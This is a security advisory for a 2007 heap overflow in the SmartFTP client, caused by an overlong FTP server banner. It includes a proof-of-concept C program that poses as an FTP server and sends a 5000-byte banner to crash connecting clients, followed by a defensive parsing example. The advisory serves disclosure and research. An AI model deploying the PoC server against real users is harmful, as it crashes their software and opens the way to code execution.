SmartFTP Overlong Banner Remote Heap Overflow Vulnerability

Published: 2007-02-05
Updated: 2007-02-06

Affected systems:
SmartFTP SmartFTP 2.0.1002
Description:
BUGTRAQ ID: 22390

SmartFTP is an FTP client with an Explorer-like user interface.

SmartFTP contains a heap overflow in its handling of the banner reply sent by an FTP server; a remote malicious FTP server could exploit it to take control of the user's machine.

If the server returns a banner reply longer than 4000 bytes to the client, the overflow can be triggered and arbitrary instructions executed.

<*Source: Marsu Pilami
  
  Link: http://secunia.com/advisories/24051/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

/***************************************************************************
*              SmartFTP Client v 2.0.1002 Heap Overflow DoS                *
*                                                                          *
*                                                                          *
* There is a remote heap overflow in SmartFTP. When the app receives a     *
* long banner (5000 chars) the heap is smashed, leading to DoS and to code *
* execution.                                                               *
*                                                                          *
* There are also two buffer overflows in the fields Address and Login.     *
* I've reported this to Secunia but it seems they didn't think it was      *
* dangerous because they didn't publish anything about it. However a       *
* simple drag'n drop could compromise your system...                       *
*                                                                          *
* Have Fun!                                                                *
*                                                                          *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                              *
***************************************************************************/



#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
    char evilbuff[5000];
    struct sockaddr_in sin;
    SOCKET server, client;
    WSADATA wsaData;
    WSAStartup(MAKEWORD(1,1), &wsaData);

    /* Act as a minimal FTP server: listen on the control port and wait for
       the SmartFTP client to connect. */
    server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons( 21 );
    if (bind(server, (struct sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
    {
        printf("[-] bind() failed (port 21 in use or insufficient privileges)\n");
        return -1;
    }
    printf("[*] Listening on port 21...\n");
    listen(server,5);
    printf("[*] Waiting for client ...\n");
    client=accept(server,NULL,NULL);
    printf("[+] Client connected\n");

    /* Build a 4999-byte greeting "220 AAAA...\r\n": a valid 220 reply code
       followed by filler, far longer than the client's banner buffer. */
    memset(evilbuff,'A',5000);
    memcpy(evilbuff,"220 ",4);
    memcpy(evilbuff+4997,"\r\n\0",3);

    if (send(client,evilbuff,strlen(evilbuff),0)==-1)
    {
        printf("[-] Error in send!\n");
        exit(-1);
    }
    printf("[+] Data sent\n");

    Sleep(1500);

    /* If the client has crashed, the connection is gone and this send fails. */
    if (send(client,"boom?",5,0)==-1)
        printf("[+] Crashed? Crashed!\n");
    else
        printf("[-] Exploit failed!\n");

    closesocket(client);
    closesocket(server);
    WSACleanup();
    return 0;
}
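The root cause described above is a client that copies a reply line of attacker-chosen length into a fixed-size heap buffer. As an added defensive illustration (not part of the advisory and not SmartFTP's code), the reader below enforces a line limit before copying anything and refuses an oversized banner; the 5000-byte banner fed to it is constructed locally to mirror the PoC above, and MAX_REPLY_LINE is an assumed, arbitrarily chosen cap.

```c
#include <stdlib.h>
#include <string.h>
/* Longest reply line this client will buffer (RFC 959 sets no limit itself). */
#define MAX_REPLY_LINE 1024u
enum { BANNER_OK = 0, BANNER_INCOMPLETE = 1, BANNER_TOO_LONG = 2, BANNER_NOMEM = 3 };

/* Copy the first CRLF-terminated reply line out of `len` received bytes into a
 * heap buffer sized from the real line length (at most MAX_REPLY_LINE + 1).
 * An oversized banner is refused instead of overrunning a fixed allocation. */
int read_banner_line(const unsigned char *data, size_t len, char **out)
{
    size_t limit = len < MAX_REPLY_LINE + 2 ? len : MAX_REPLY_LINE + 2; /* text + CRLF */
    size_t i;
    *out = NULL;
    for (i = 0; i + 1 < limit; i++) {
        if (data[i] == '\r' && data[i + 1] == '\n') {
            char *line = malloc(i + 1);             /* i text bytes + NUL */
            if (line == NULL)
                return BANNER_NOMEM;
            memcpy(line, data, i);
            line[i] = '\0';
            *out = line;
            return BANNER_OK;
        }
    }
    /* No CRLF in the window: already too long, or the peer is not finished. */
    return len >= MAX_REPLY_LINE + 2 ? BANNER_TOO_LONG : BANNER_INCOMPLETE;
}

/* Parse one chunk; if a line comes back it must equal `expect` (when given). */
int check_banner(const unsigned char *pkt, size_t len, const char *expect)
{
    char *line = NULL;
    int rc = read_banner_line(pkt, len, &line);
    if (rc == BANNER_OK && expect != NULL && strcmp(line, expect) != 0)
        rc = -1;
    free(line);                                     /* NULL when refused */
    return rc;
}

/* The 5000-byte "220 AAAA...\r\n" banner the PoC above sends, built locally
 * (constructed input, not received from any server). */
int check_poc_banner(void)
{
    unsigned char banner[5000];
    memset(banner, 'A', sizeof banner);
    memcpy(banner, "220 ", 4);
    memcpy(banner + 4997, "\r\n", 2);
    return check_banner(banner, 4999, NULL);        /* BANNER_TOO_LONG */
}
```

A real client would call read_banner_line repeatedly while it returns BANNER_INCOMPLETE and drop the connection on BANNER_TOO_LONG, so the buffered data never exceeds the cap.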

Recommendation:
Vendor patch:

SmartFTP
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.smartftp.com/

This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.